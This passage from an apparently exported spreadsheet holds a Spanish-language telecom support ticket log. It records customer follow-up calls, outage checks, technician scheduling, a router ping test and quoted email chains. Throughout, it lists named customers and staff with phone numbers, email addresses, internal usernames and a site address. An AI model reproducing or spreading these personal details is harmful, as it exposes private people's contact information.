##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME GAYARNO AL 58410180 CONFIRFMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001255060
**</t>
  </si>
  <si>
    <t>F4562216</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24139090 EXT 82580 NO SE OGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 2001210621</t>
  </si>
  <si>
    <t>SE LE LLAMA NUEVAMENTE A WALTER AROCHE AL 24139400 EXT 87270 ID 2001264157 PARA EL SEGUIMIENTO Y COMENTA QUE HARÁ LA TRANSFERENCIA CON EL PR PARA VALIDAR EL SERVICIO Y SE ESTA EN LINEA EL PR KARLA GODOY QUIEN COMENTA QUE EL SERVICIO ESTA OPERATIVO, INTERVIENE WALTER Y COMENTA QUE ES PORQUE ESTA CON TIGO LA CONECTIVIDAD PERO POR PARTE DE CLARO SIGUE LA INCIDENCIA, POR LO QUE SE PROCEDE A TRASLADAR LA INFORMACIÓN AL 8126 ID 2001266589 ATIENDE LESTER Y COMENTA QUE VA A TRANSFERIR CON EL GESTOR Y AL TRANSFERIR INDICA QUE NO ESTA DISPONIBLE SE LIBERA LA LLAMADA Y SE VUELVE A INTENTAR AL 8126 ID 2001267239 INGRESA CON DARWIN ESPAÑA Y SE DEJA CON EL PR EN LINEA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 24139090 NO RESPONDE, SE INTENTARA LUEGO**
ID 2001201508
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24139090 EXT 82580 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 2001230494
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 24139090 NO RESPONDE, SE INTENTARA LUEGO**
ID 200 1185086
**</t>
  </si>
  <si>
    <t>F4562218</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                                			9:40
1/4	LUIS SANDRES           	89904245	2.5 HORAS	12:10:00
2/4	FRANKLIN BUESO  	89904208	3 HORAS	12:40:00
3/4	MANUEL LARIOS   	31921638	5 HORAS	14:40:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	15:40:00</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A TECNIOCO EN VARIAS OCACIONES NUMERO REGISTRADO NO ES CORRECTO</t>
  </si>
  <si>
    <t>F4562222</t>
  </si>
  <si>
    <t>SE VALIDA LA CRONOLOGÍA DE LA FALLA Y NO SE VALIDA QUE SE TENGA ALGO PENDIENTES, NO HAY LLAMADAS AL PR O CORREO, Y LLEVA MAS DE 4 HORAS SIN SEGUIMIENTO, POR LO QUE SE CAMBIA DE ESTADO YA QUE NO APLICA, INFORMA QUE BRINDARA EL SEGUIMIENTO</t>
  </si>
  <si>
    <t>F4562226</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A  ANGEL MARADIAGA
2001211160
COLA:
NOMBRE: A: 0050497608103
NÚMERO: 0050497608103
DURACIÓN: 0:01:29
ESTADO: CONECTADA
DETALLES: 0050497608103
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 11:45:19</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE  ANGEL MARADIAGA INDICA QUE SE TIENE INESTABILIDAD EN HORAS PICO 3:30 A 17:00 HORAS, YA QUE SE CAE EL SERVICIO, SOLICITA SE DEJE EN OBSERVACION PARA DETERMINAR LA CAUSA RAIZ YA QUE ES REINCIDENTE.
2001211160
COLA:
NOMBRE: A: 0050497608103
NÚMERO: 0050497608103
DURACIÓN: 0:18:28
ESTADO: CONECTADA
DETALLES: 0050497608103
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 12:02:17</t>
  </si>
  <si>
    <t>SEGUN LO CONVERSADO CON CLIENTE, YA QUE PRESENTE PERDIDAS Y NO SE VE SATURACION DEL ENLACE SE DEJARA EN OBSERVACION HASTA  QU SE EL INDIQUE LA CAUSA RAIZ,  SOLICITA QUE SE MANTENGA HASTA MAÑANAS A LAS 20:00 HORAS.
NÚMERO: 0050497608103
FIN: HOY, 12:18
ID DE LLAMADA: 2001222289</t>
  </si>
  <si>
    <t>F4562260</t>
  </si>
  <si>
    <t>SE RECIBIÓ RESPUESTA DE PARTE DEL CLIENTE || EN ESPERA DE DETALLE DE LO ENCONTRADO
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 09:53
PARA: WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;
CC: DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;; ECHOQUIN@5B.COM.GT &lt;ECHOQUIN@5B.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; CESAR RIGOBERTO LEAL OLIVA &lt;CESARR.LEAL@CLARO.COM.GT&gt;; SILDA ANABELLA SALAZAR ALVAREZ &lt;SILDA.SALAZAR@CLARO.COM.GT&gt;; THELMA.PAPPA@CLARO.COM.GT &lt;THELMA.PAPPA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CSOSA@5B.COM.GT &lt;CSOSA@5B.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-749774##] : ENLACE ALARMADO CC_TYT_GT_ATM4892
BUENOS DIAS, SE ENVIO SUPERVISOR A VERIFICAR.
ORLANDO RAMIREZ
SERVICIOS 5B
PBX: (502) 2420-7200
DETALLE DE SOLICITUD ATENDIDA
SOLICITANTE
 WILLIAM GABRIEL SANAVRIA
EMAIL
 WILLIAM.SANAVRIA@CLARO.COM.GT
CC
ESTADO
 EN EJECUCIÓN
ASUNTO
ENLACE ALARMADO CC_TYT_GT_ATM4892</t>
  </si>
  <si>
    <t>F4562286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANTONI VELASQUEZ 50170599  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001277628</t>
  </si>
  <si>
    <t>F4562307</t>
  </si>
  <si>
    <t>SE CONTACTA CON MARCIO HERNANDEZ AL  52008420 ID 2001270628 DONDE SE VALIDA QUE AUN CONTINUA LA AFECTACIÓN POR LO QUE SE TRANSFIERE AL 8126 CON EL GESTOR LUIS.IXCOT ID  2001271284 Y LESTE QUE ES DE WO POR LO QUE COMENTA QUE VA A TRANSFERIR CON OTRO GESTOR Y ATIENDE DARWIN ESPAÑA EN EL CUAL COMENTA QUE LE BRINDARA EL SOPORTE Y SE DEJA CON EL PR EN LINEA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCIO HERNANDEZ AL 52008420 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001675121
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCIO HERNANDEZ AL 52008420 CONFIRMA SERVICIO ESTABLE Y OPERATIVO. AUTORIZA CIERRE DE TICKET **
ID 2001713271
**</t>
  </si>
  <si>
    <t>F4562315</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN RECINOS 78424477  MENCIONA QUE YA LLEGO PERSONAL TECNICO Y QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
AUTORIZA CIERRE DE TICKET
-ID 2001289251</t>
  </si>
  <si>
    <t>F4562330</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ATIENDE  LESTER, COMENTA  QUE SE REPROGRAME LA VISITA PARA EL DIA DE MAÑAN A LAS 8:00 AM.
2001321789
COLA:
NOMBRE: A: 47702296
NÚMERO: 47702296
DURACIÓN: 0:01:53
ESTADO: CONECTADA
DETALLES: 47702296
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 13/05/2022 18:00:52</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE RESPONDE QUE SE REALICE COORDINACIÓN DE VISITA TECNICA A LOS NÚMEROS QUE BRINDO DEL PDV, SE CONTACTA AL G105 Y SE DEJA EN CONFERENCIA CON EL GESTOR LESTER.RODAS*/*/*/*
-SE RESPONDE CORREO:
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: VIERNES, 13 DE MAYO DE 2022 14:21
PARA: 'JUAN ELIAS SIERRA ORTIZ' &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
CC: PEDRO JACOBO PAREDES LOPEZ &lt;JACOBO.PAREDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 105_629100004T
BUENAS TARDES JUAN ELIAS,
            DANDO SEGUIMIENTO A SU CASO, ME HE COMUNICADO CON EL PDV Y LO HE DEJADO EN CONFERENCIA CON EL GESTOR A CARGO PARA PROCEDER A COORDINAR LA VISITA TÉCNICA, QUEDAMOS ATENTOS A LOS AVANCES.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-----------------------------------------------------------------------------------------------------
DE: JUAN ELIAS SIERRA ORTIZ [MAILTO:JUAN.SIERRA@SOMOSCMI.COM]
ENVIADO EL: VIERNES, 13 DE MAYO DE 2022 14:03
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
CC: PEDRO JACOBO PAREDES LOPEZ &lt;JACOBO.PAREDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 105_629100004T
BUEN DIA,
FAVOR COORDINAR LA VISITA CON LOS CONTACTOS Y NÚMEROS QUE PROPORCIONAMOS.
47702296
4704-6763
78794528
SALUDOS.</t>
  </si>
  <si>
    <t>F4562331</t>
  </si>
  <si>
    <t>##EN ESPERA DE PERMISOS POR PARTEDE BODEGA</t>
  </si>
  <si>
    <t>CLIENTE NOEL DONIS-47242314  NOS COMENTA QUE ESTAN TRAMITANDO PERMISOS PARA TECNICOS, Y QUE EN UN APROX DE 20-30 MINUTOS SE TENDRAN LOS PERMISOS ##</t>
  </si>
  <si>
    <t>SE A CLIENTE EN LINEA-  NOEL DONIS-47242314  ##VIVO</t>
  </si>
  <si>
    <t>F4562332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. GABRIELA ALVARADO 25053501 INFORMA QUE YA REESTABLECION LA CONEXION HACIA INTERNET, PERO SOLICITA QUE SE LLAME A LAS 2PM PARA VALIDACION FINAL. ID: 2001185908.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIELA  ALVARADO AL 25053501 CONTESTA UNA SEÑORITA INDICA QUE CLIENTE ESTA EN UNA REUNION QUE SE LE LLAME A LAS 14:30 PM **
ID 2001676448
**</t>
  </si>
  <si>
    <t>SE LE SOLICITA CLIENTE ESTALAR A SU ENCARGADO IT PARA REVISAR SUS EQUIPOS INTERNOS, SOLICITA LLAMAR EL DIA LUNES DESPUES DE MEDIO DIA PARA VALIDAR ENLACE.
ID1029364#PING 8.8.8.8 SOURCE GIGABITETHERNET 0/1 RE 8000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 8000, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.86.184.118
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (3600/3600), ROUND-TRIP MIN/AVG/MAX = 28/30/124 MS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SRTA. GABRIELA ALVARADO 25053501 CONTESTA LA SEÑORITA CLAUDIA INIDCA QUE SE VOLVIO A CAER EL SERVICIO QUE AHORITA NO TIENEN SERVICIO, SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 2001261637
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIELA ALVARADO 25053501 MENCIONA QUE HAN PRESENTADO INESTABILIDAD, SE LE MENCIONAQUE A NIVEL DE CLARO EL SERVICIO SE ENCUENTRA OPERATIVO Y ESTABLE
CLIENTE SOLICITARA UNA CERTIFICACION A SU EJECUTIVO
-ID 2001733353</t>
  </si>
  <si>
    <t>F4562337</t>
  </si>
  <si>
    <t>SE LLAMA A GABRIELA --  9677-4681  SIN EMBARGO NO RESPONDE-- ENVIA A BUZON</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIELA --  9677-4681 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001205532
**</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO  87349985ATIENDE CABALLERO QUIEN NO BRINDA NOMBRE SOLICITA LLAMDA A LAS 13:50 YA QUE SE ENCUENTRA FUERA DE OFICINA.--</t>
  </si>
  <si>
    <t>F4562348</t>
  </si>
  <si>
    <t>CLIENTE COMENTA QUE SÍ TIENE SUS CREDENCIALES POR LO QUE SE PROCEDERÁ A COORDINAR VISITA PARA CERTIFICAR EL E1</t>
  </si>
  <si>
    <t>INORMA CLIENTE KEVIN LOPEZ 55590041 QUE NO SE ENCUENTRA EN LAS INSTALACIONES EN ESTE MOMENTO, SOLICITA SE LE LLAME A LAS 12:00 HORAS PARA REALIZAR PRUEBAS.  ID DE LLAMADA: 2001200149</t>
  </si>
  <si>
    <t>EN LLAMADA CON CLIENTE KEVIN LOPEZ 55590041, APOYA UBICANDO EQUIPO AETHRA BG7420 EL CUAL NO ESTÁ ALARMADO. SE LE SOLICITA REINICIARLO, CLIENTE UBICA TAMBIEN EQUIPO ROUTERBOARD Y TAMBIÉN LO REINICIA. LUEGO DE ESTO EL E1 CONTINUA EN EL MISMO ESTADO, SE OBSERVA ACTIVO PERO NO COMPLETA LLAMADAS. CLIENTE NOS COMENTA QUE YA REINICIÓ LA PBX Y YA NO QUIERE VOLVER A REINICIARLO YA QUE SE PUEDE DAÑAR.</t>
  </si>
  <si>
    <t>F4562349</t>
  </si>
  <si>
    <t>SE APLICA REINICIO A LOS EQUIOPOS Y SERVICIO LEVANTA, CLIENTE MENCIONA QUE EL ONT HUAWEI SE ENCONTRABA UNICAMENTE CON LUZ DE POWER, LUEGO DEL REINICIO SERVICIO RESTABLECE, CLINTE MENCIONA QUE EL LUNES LE SUCEDIO LO MISMO, CON RENICIO LEVANTÓ, SI VUELVE A SUCEDER EL MISMO INCONVENIENTE MENCIONA QUE SOLICITARA CAMBIO DE EQUIPO. CLIENTE SOLICITA MONITOREO HASTA LAS 12:00 HORAS DE HOY.
2001191587
COLA: CNOC_SEGUIMIENTO
NOMBRE: DE: 58260255
NÚMERO: 58260255
DURACIÓN: 0:00:55
ESTADO: ACD - ASIGNADO A: LUVY.SANDOVAL
DETALLES: 58260255
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 10:50:34</t>
  </si>
  <si>
    <t>.SE LLAMA A CLIENTE JAIRO HERNANDEZ 42678092 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001222331</t>
  </si>
  <si>
    <t>F4562350</t>
  </si>
  <si>
    <t>SE LLAMA A AROLDO BARRIOS PERO NO RESPONDE || SE LLAMARÁ NUEVAMENTE
2001186652
COLA:
NOMBRE: A: 53301697
NÚMERO: 55280199
DURACIÓN: 0:00:28
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 13/05/2022 10:37:09
2001186838
COLA:
NOMBRE: A: 53301697
NÚMERO: 55280199
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 13/05/2022 10:38:00</t>
  </si>
  <si>
    <t>F4562358</t>
  </si>
  <si>
    <t>SE VALIDA QUE NUEVAMENTE SE PASA EL TT A PC CUANDO NO HAY NADA PENDIENTE DEL CLIENTE POR LO QUE SE SOLICITA QUE POR FAVOR NOS INDIQUEN LA RAZÓN DEL ESTADO PARA NO CAMBIARLO. MIENTRAS SE PASA A TRABAJO EN CURSO. SE NOTIFICA AL GESTOR FRANCISCO.QUEZADA VIA SKYPE Y SE ESCALA CON JUAN MANUEL CARDONA AL  41287321 ID 2001274652 COMENTA QUE LE BRINDARA EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4562377</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE OSWALDO HERNANDEZ SOLICITANDO AVANCES ID: 2001226085
CL CONFIRMA QUE ENERGIA EN SITIO ESTA OK, INDICA QUE LED DE ROUTER ESTA ALARMADA EN ROJO, YA REALIZARON REINICIOS FISICOS Y AUN NO FUNCIONA, SOLICITA SI ES NECESARIA UNA VISITA AL SITIO LE PUEDAN COMPOARTIR SOLICITUD DE ACCESOS A LA COLA DE CORREOS YA CREADA
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100023T::: TICKET CNOC IMBBL003876::: "FUERA DE SERVICIO "
SE NOTIFICA A JHONNSER.ESCOBAR VIA SKYPE, SE CAMBIA A WIP YA DEBIDO A QUE EL CLIENTE YA BRINDO INFO Y YA NO APLICA PC</t>
  </si>
  <si>
    <t>F4562387</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NENDROL VALENCIA - 47065702 MENCIONA QUE APLICARON REINICIO A LOS EQUIPOS Y ACTUALEMTE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 2001234227</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDRA PALENCIA 4932 8491 MENCIONA QUE ESTARA VALIDANDO POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001225482</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDRA PALENCIA 49328491 MENCIONA QUE SI CUENTAN CON ENERGIA ELECTRICA POR LO QUE BRINDA CONTACTO DE PR  NENDROL VALENCIA - 47065702
-ID 2001228978</t>
  </si>
  <si>
    <t>F4562393</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESSICA MARÍA LÓPEZ 42373696 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001305091 - 2001305297</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA MARÍA LÓPEZ HERNÁNDEZ AL 42373696 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001212186
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, JESSICA MARÍA LÓPEZ HERNÁNDEZ, INDICA QUE LE ESPERA EN LINEA MIENTRAS VALIDA ESTADO DEL SERVICIO, CLIENTE CONFIRMA OPERATIVO EL SERVICIO Y SOLICITA DEJARLO EN MONITOREO HASTA LAS 16:00 HORAS, INDICA QUE SI HASTA ESTE HORARIO SE MANTIENE ESTABLE EL SERVICIO QUE SE PROCEDA AL CIERRE DE CASO.
2001247988
COLA:
NOMBRE: A: 42373696
NÚMERO: 42373696
DURACIÓN: 0:01:57
ESTADO: CONECTADA
DETALLES: 42373696
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 13:34:01</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BIANCA TOLEDO - 40092725 QUIEN REINICIA LOS EQUIPOS PERO INDICA QUE EL INCONVENIENTE PERSISTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001229882
NOMBRE DEL CLIENTE: MINISTERIO PUBLICO
UBICACIÓN:AGENCIA FISCAL SAN LUIS JILOTEPEQUE BARRIO EL CALVARIO, A UN COSTADO DE LA POLICÍA NACIONAL CIVIL
CONTACTO EN SITIO:  BIANCA TOLEDO - 40092725
HORARIO DE ATENCION: HASTA LAS 16 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE JESSICA MARÍA LÓPEZ 42373696 MENCIONA QUE TODO ESTA BIEN CON LA ENERGIA POR LO QUE BRINDA CONTACTO DE PR BIANCA TOLEDO - 40092725
-ID 2001226801</t>
  </si>
  <si>
    <t>F4562396</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO AL CLIENTE PARA GESTIONAR PERMISOS
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 13 DE MAYO DE 2022 13:43
